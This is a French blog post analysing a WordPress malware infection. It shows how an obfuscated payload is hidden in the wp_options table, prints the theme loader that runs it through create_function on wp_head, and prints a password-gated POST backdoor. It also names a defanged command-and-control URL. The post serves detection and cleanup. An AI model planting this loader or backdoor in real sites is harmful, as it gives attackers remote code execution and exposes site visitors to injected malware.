Hacké la base de données et wp_head Wordpress par injection


, Mis à jour le 29 mai, 2014

Hacké la base de données et wp_head Wordpress par injection

Il existe plusieurs endroits où une injection de logiciels malveillants peuvent être cachés sur un site web. Sur WordPress, par exemple, l’injection de virus peut avoir lieu dans les fichiers de base, des thèmes, des plugins, le .htaccess et dans la base de données. La plupart du temps, le malware utilise une combinaison de plusieurs méthodes d’injections ou plus ce qui le rend plus difficile à détecter.

Aujourd'hui, nous allons parler d'une injection de la base de données qui est devenu assez fréquente ces derniers temps. Ce type d’injection utilise wp_head () pour afficher le malware à toute personne visitant un site web piraté.

Injection de base de données

WordPress offre de multiples requêtes API pour gérer et lire le contenu à partir de la base de données. L'une de ces requêtes est la fonction de get_option qui renvoie une valeur de la table wp_options. Le tableau des wp_options est largement utilisé par de nombreux plugins et des thèmes pour stocker des données à long terme. Généralement il est plein d'entrées ce qui en fait un bon endroit pour cacher un code malveillant.

Si vous ne me croyez pas, allez à la table wp_options pour voir ce dont je parle.

Voici ce que peut contenir un tableau wp_options d’un site hacké:

 

s:7546:"a:18:{i:0;s:10:"11-07-2013";i:1;s:1:"e";i:2;s:32:"061d57e97e504a23cc932031f712f730";i:3;s:32:"07b6910226033fa5ee75721b4fc6573f";i:4;s:4:"val(";i:5;s:32:"2a27230f54e4cea4a8ed38d66e2c0";i:6;s:1:"(";i:7;s:6993:"'LyogTXVuaW5uIHZlcnNpb246MSBkYXRlOjIxLjVFsncGFzcyddKT09PSc2OTJlM2Y1MmVlNmYxNmJjNzhmYTZlMWVjNGJkNGE2YScVCwgRVhUUl9TS0lQKTsKCglpZighZW1wdHkoJHRob3IpKQoJCUAkdGhvcigkaGFdGlvbl9leGlzdHMgKCdzdHJpcG9zJykpIHsKCWZ1bmN0aW9uIHN0cmlwb3MgKCRG9mZnNldD0wKSB7CgkJcmV0dXJuIHN0cnBvcyAoc3RydG...... trop long pour tout afficher ..

Comme vous pouvez le voir, il s'agit d'une entrée de PHP sérialisé (entièrement décodé sur ddecode) qui, à première vue, ne semble pas trop mauvais et ne peut pas vraiment faire de mal en soi.

L'exécution du contenu de la base

Le code malveillant a été caché à l'intérieur de la base de données, mais comment peut-il être exécuté? Les pirates, en plus de l'injection de ce contenu, ont  également modifié le fichier index.php du thème avec ce code:

 function page_options() { $option = get_option("page_option"); $opt= unserialize( $option);        @$arg = create_function("", $opt[1] .$opt[4] .$opt[10]. $opt[12].$opt[14]. $opt[7] );return $arg('');}add_action('wp_head', 'page_options'); 

Et c'est là que tout se lie ensemble.

  • Ce code utilise get_option pour télécharger le contenu de "page_option" de la base de données : get_option ("page_option");
  • Puisque le contenu est encrypté, il le décrypte() avec ce code: $opt = unserialize ($option);
  • Ce qui construit une nouvelle fonction appelée $arg et l'exécute sur la base du contenu récupéré. Ce n'est que lorsque cette fonction est exécutée que le malware devient actif @$arg = create_function.

 
La dernière pièce du puzzle est effectué par la fonction de add_action(). Ce qui entraîne l’exécution de la fonction dans la section « head » (initialisation) de WordPress.

Ce qui est intéressant, c'est qu'avec un tel code simple, les pirates sont capables de contourner la plupart des outils de sécurité qui recherchent certaines commandes tels que : eval, base64_decode ou les traces de requêtes du système.

Backdoor et injection

Une fois ce type de logiciel malveillant est installé sur un site compromis, il devient comme une Backdoor (exécutant les valeurs de la variable POST Thor et le Hammer):

if( @md5($_POST["pass"])==='692e3f52ee6f16bc78fa6e1ec4bd4a6a') {        @extract( $_POST, EXTR_SKIP);        if(!empty($thor))               @$thor( $hammer);}

Ce malware injecte également du contenu malveillant lié à l’injection «WORDPRESS COUNTER » à partir du navigateur de toute personne visitant le site (téléchargeable sur le site de commande et de contrôle:
httx :/ / kadaffizzet.com / kasiapa).

Conclusion

Vous ne pouvez pas compter sur une simple recherche par mot clé pour identifier les injections de logiciels malveillants. Les hackers évoluent et utilisent plusieurs tactiques pour cacher leurs backdoors et des outils malveillants. Si vous avez besoin d'aide pour nettoyer votre site WordPress, veuillez nous contacter pour un devis.


comments powered by Disqus

10 conseils pour bien sécuriser wordpress

10 conseils pour bien sécuriser wordpress

Depuis qu'il a été introduit il y a plus de deux décennies, WordPress a développé et est maintenant devenu le système de gestion de contenu le plus populaire au monde. Aujourd'hui, plus d'un quart des sites existants sont exécutés sur WordPress. Pourtant, depuis des temps immémoriaux, plus une chos … Continuer

Publié le 23 juin, 2018

0 Commentaires
Comment ajouter Google Analytics à Wordpress

Comment ajouter Google Analytics à Wordpress

Le fait d’ajouter Google Analytics à votre site WordPress  vous aidera à savoir qui ont visité votre site, qu'est-ce qu’ils ont regardé, et  comment ont-ils atterri sur votre site. Le moyen le plus simple est d’utiliser un plugin, comme notre Google Analytics+, qui vous permet d’accéder rapidement … Continuer

Publié le 20 avril, 2017

0 Commentaires
Comment changer un domaine principal wp multi-site

Comment changer un domaine principal wp multi-site

Si vous voulez changer le domaine principal de l'installation de votre WordPress multi-site, il y a 5 valeurs à modifier. Vous n’aurez pas besoin d'effectuer une dump de base de données. Ceci est en fait désapprouvé parceque WordPress enregistre des données en séries, et la modification de cela peut … Continuer

Publié le 8 octobre, 2016

0 Commentaires



Les avis des clients

Avis des utilisateurs


Faites entendre votre voix. Passez en revue votre fournisseur d'hébergement Web - bon ou mauvais.


Après avoir essayé quelques autre hébergeurs, nous avons découvert Ex2Hosting. Cet hébergeur est très sérieux et nous le recommandons à tous nos clients. - Le Cpanel permettant de gérer les hébergements est très ergonomique. Il permet la gestion d'un hébergement en toute facilité et rapidité. Po …

Jérôme BRAVIN à propos Ex2hosting

Montrer une autre revue
Lire les avis Ex2hosting



Plans d'hébergement




Les plans d'hébergement de 60 sociétés d'hébergement partout dans le monde


Meilleur hébergeurs web

# hébergeur web prix action

1

Ex2hosting

3.99 EURO

Ajouter un Avis
Visiter

2

Infomaniak France

6.75 EURO

Ajouter un Avis
Visiter

3

Siteground

6.95 USD

Ajouter un Avis
Visiter

4

Inmotion

5.95 USD

Ajouter un Avis
Visiter

5

Webhostinghub

4.95 USD

Ajouter un Avis
Visiter

6

Bluehost

6.95 USD

Ajouter un Avis
Visiter






Hébergeurs par avis de clients

Ex2hosting
176 avis des clients
1and1 France
71 avis des clients
Hostpapa France
68 avis des clients
Infomaniak France
50 avis des clients
Rapidenet
50 avis des clients
Ajouter un avis Tous les profils


Hébergeurs par fidélité de clients

Ex2hosting
171 / 176 recommandé
Infomaniak France
50 / 50 recommandé
Rapidenet
49 / 50 recommandé
Hostpapa France
39 / 68 recommandé
Infomaniak Suisse
36 / 36 recommandé
Évaluer hébergeur Tous les profils


Question de la Semaine


Le plus important critère de votre hébergeur



Contacter l'éditeur

Posez votre question